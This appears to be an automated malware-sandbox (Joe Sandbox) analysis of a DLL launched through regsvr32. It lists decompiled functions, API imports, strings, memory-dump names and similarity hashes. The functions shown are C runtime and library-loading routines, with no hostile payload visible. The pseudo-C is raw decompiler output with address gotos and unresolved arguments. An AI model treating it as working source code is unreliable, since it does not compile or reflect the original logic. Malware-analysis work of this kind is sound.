Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}

0x1800045bc
0x1800045c1
0x1800045c6
0x1800045e1
0x1800045ee
0x1800045fa
0x180004603
0x18000460c
0x180004615
0x180004621
0x180004626
0x18000462c
0x18000463b
0x180004641
0x180004647
0x18000464d
0x180004658
0x18000465a
0x18000465a
0x18000466f
0x180004671
0x180004679
0x180004685
0x180004691
0x1800046a0
0x1800046af
0x1800046af
0x1800046af
0x1800046ba
0x1800046bf
0x1800046cb
0x1800046d4
0x1800046d9
0x1800046e1
0x1800046e3
0x180004709

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB

Strings

api-ms-, xrefs: 0000000180004661

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180007DC7
FlsGetValue.KERNEL32 ref: 0000000180007DDC
FlsSetValue.KERNEL32 ref: 0000000180007DFD
FlsSetValue.KERNEL32 ref: 0000000180007E2A
FlsSetValue.KERNEL32 ref: 0000000180007E3B
FlsSetValue.KERNEL32 ref: 0000000180007E4C
SetLastError.KERNEL32 ref: 0000000180007E67

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000018000F3A5
GetLastError.KERNEL32 ref: 000000018000F3B1
CloseHandle.KERNEL32 ref: 000000018000F3C9
CreateFileW.KERNEL32 ref: 000000018000F3F4
WriteConsoleW.KERNEL32 ref: 000000018000F413

Strings

CONOUT$, xrefs: 000000018000F3D5

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 0000000180014CBF
LoadStringW.USER32 ref: 0000000180014CDC

Part of subcall function 00000001800109D0: LoadCursorW.USER32 ref: 0000000180010A22
Part of subcall function 00000001800109D0: RegisterClassExW.USER32 ref: 0000000180010A59

Part of subcall function 0000000180010910: CreateWindowExW.USER32 ref: 000000018001098A

GetMessageW.USER32 ref: 0000000180014D0F
TranslateAcceleratorW.USER32 ref: 0000000180014D25
TranslateMessage.USER32 ref: 0000000180014D34
DispatchMessageW.USER32 ref: 0000000180014D3F

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
String ID:
API String ID: 1967609040-0
Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}

0x180003b5c
0x180003b5f
0x180003b63
0x180003b67
0x180003b6b
0x180003b75
0x180003b78
0x180003b7e
0x180003b81
0x180003b84
0x180003b89
0x180003b8e
0x180003ba4
0x180003bac
0x180003bb0
0x180003bb6
0x180003bc0
0x180003bc4
0x180003bd2
0x180003bd8
0x180003be2
0x180003bec
0x180003bfa
0x180003c04
0x180003c08
0x180003c14
0x180003c1c
0x180003c25
0x180003c2b
0x180003c37
0x180003c3c
0x180003c43
0x180003c45
0x180003c4d
0x180003c57
0x180003c61
0x180003c6c
0x180003c71
0x180003c7a
0x180003c88
0x180003c8a
0x180003c8e
0x180003c90
0x180003c9c
0x180003caa
0x180003cb8
0x180003cc4
0x180003cca
0x180003cd3
0x180003cd5
0x180003cdd
0x180003cdf
0x180003cf2
0x180003d09
0x180003d18
0x180003d20
0x180003d27
0x180003d2c
0x180003d32
0x180003d3f
0x180003d51
0x180003d5f
0x180003d63
0x180003d68
0x180003d8c

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180003B84
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000000180003C6C
__std_exception_copy.LIBVCRUNTIME ref: 0000000180003DB8

Strings

csm, xrefs: 0000000180003BA6
csm, xrefs: 0000000180003CBE

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
String ID: csm$csm
API String ID: 851805269-3733052814
Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}

0x180002a84
0x180002a84
0x180002a89
0x180002a8e
0x180002a9c
0x180002aa0
0x180002aa3
0x180002aac
0x180002aaf
0x180002ab4
0x180002abb
0x180002abf
0x180002ac6
0x180002aca
0x180002ad0
0x180002ad5
0x180002adc
0x180002ae4
0x180002aee
0x180002afb
0x180002b06
0x180002b11
0x180002b24
0x180002b26
0x180002b28
0x180002b31
0x180002b3b
0x180002b4b
0x180002b55
0x180002b5f
0x180002b6b
0x180002b77
0x180002b7e
0x180002b85
0x180002b8a
0x180002b8e
0x180002b93
0x180002b99
0x180002ba0
0x180002ba7
0x180002bb0
0x180002bb3
0x180002bba
0x180002bc4
0x180002bce
0x180002bd1
0x180002bd3
0x180002bd7
0x180002bdb
0x180002bdd
0x180002be2
0x180002be4
0x180002be7
0x180002bf2
0x180002bfc
0x180002c07
0x180002c12
0x180002c14
0x180002c1a
0x180002c1f
0x180002c27
0x180002c2c
0x180002c31
0x180002c33
0x180002c3b
0x180002c3f
0x180002c49
0x180002c52
0x180002c7a

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180002AAF
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180002B44
RtlUnwindEx.KERNEL32 ref: 0000000180002B93

Strings

csm, xrefs: 0000000180002B2A
f, xrefs: 0000000180002AC2

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000000018000612D
GetProcAddress.KERNEL32 ref: 0000000180006143
FreeLibrary.KERNEL32 ref: 000000018000616A

Strings

mscoree.dll, xrefs: 0000000180006124
CorExitProcess, xrefs: 000000018000613C

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x1800077fc
0x180007801
0x180007810
0x180007818
0x18000781d
0x180007824
0x180007829
0x18000782c
0x180007833
0x180007836
0x180007838
0x18000783d
0x18000783f
0x180007844
0x180007847
0x180007849
0x18000784d
0x18000784f
0x180007854
0x18000785b
0x180007860
0x180007863
0x180007865
0x180007869
0x18000786b
0x180007870
0x180007876
0x18000787d
0x180007882
0x180007885
0x180007889
0x18000788b
0x180007890
0x180007897
0x1800078b5

APIs

_set_statfp.LIBCMT ref: 0000000180007824
_set_statfp.LIBCMT ref: 000000018000783F
_set_statfp.LIBCMT ref: 000000018000785B
_set_statfp.LIBCMT ref: 0000000180007897

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
